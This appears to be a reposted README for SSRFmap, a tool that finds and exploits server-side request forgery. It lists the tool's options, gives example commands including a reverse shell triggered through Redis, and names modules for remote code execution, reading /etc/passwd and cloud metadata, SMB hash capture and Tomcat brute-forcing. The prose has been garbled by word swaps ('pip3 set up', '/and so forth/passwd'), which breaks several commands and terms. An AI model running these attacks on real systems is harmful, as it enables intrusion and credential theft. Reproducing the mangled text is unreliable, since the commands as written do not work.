SSRFMap – Automated SSRF Fuzzer and Exploitation Device
SSRF are sometimes used to leverage actions on different companies, this framework goals to seek out and exploit these companies simply. SSRFmap takes a Burp request file as enter and a parameter to fuzz.
Server Facet Request Forgery or SSRF is a vulnerability by which an attacker forces a server to carry out requests on their behalf.
Primary set up from the Github repository.
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 set up -r necessities.txt
python3 ssrfmap.py
Utilization:
ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[–lhost LHOST] [–lport LPORT] [–uagent USERAGENT]
[–ssl [SSL]] [–level [LEVEL]]
Elective arguments:
-h, –help present this assist message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to focus on
-m MODULES SSRF Modules to allow
-l HANDLER Begin an handler for a reverse shell
–lhost LHOST LHOST reverse shell
–lport LPORT LPORT reverse shell
–uagent USERAGENT Consumer Agent to make use of
–ssl [SSL] Use HTTPS with out verification
–level [LEVEL] Stage of check to carry out (1-5, default: 1)
The default method to make use of this script is the next.
# Launch a portscan on localhost and skim default recordsdata
python ssrfmap.py -r knowledge/request.txt -p url -m readfiles,portscan
# Launch a portscan towards an HTTPS endpoint utilizing a customized user-agent
python ssrfmap.py -r knowledge/request.txt -p url -m portscan –ssl –uagent “SSRFmapAgent”
# Triggering a reverse shell on a Redis
python ssrfmap.py -r knowledge/request.txt -p url -m redis –lhost=127.0.0.1 –lport=4242 -l 4242
# -l create a listener for reverse shell on the required port
# –lhost and –lport work like in Metasploit, these values are used to create a reverse shell payload
# –level : capability to tweak payloads in an effort to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> …
A fast method to check the framework may be achieved with knowledge/instance.py SSRF service.
FLASK_APP=knowledge/instance.py flask run &
python ssrfmap.py -r knowledge/request.txt -p url -m readfiles
Modules
The next modules are already applied and can be utilized with the -m argument.
Identify Description
fastcgi FastCGI RCE
redis Redis RCE
github Github Enterprise RCE
zabbix Zabbix RCE
mysql MySQL Command execution
docker Docker Infoleaks by way of API
smtp SMTP ship mail
portscan Scan ports for the host
networkscan HTTP Ping sweep over the community
readfiles Learn recordsdata comparable to /and so forth/passwd
alibaba Learn recordsdata from the supplier (e.g: meta-data, user-data)
aws Learn recordsdata from the supplier (e.g: meta-data, user-data)
gce Learn recordsdata from the supplier (e.g: meta-data, user-data)
digitalocean Learn recordsdata from the supplier (e.g: meta-data, user-data)
socksproxy SOCKS4 Proxy
smbhash Power an SMB authentication by way of a UNC Path
tomcat Bruteforce assault towards Tomcat Supervisor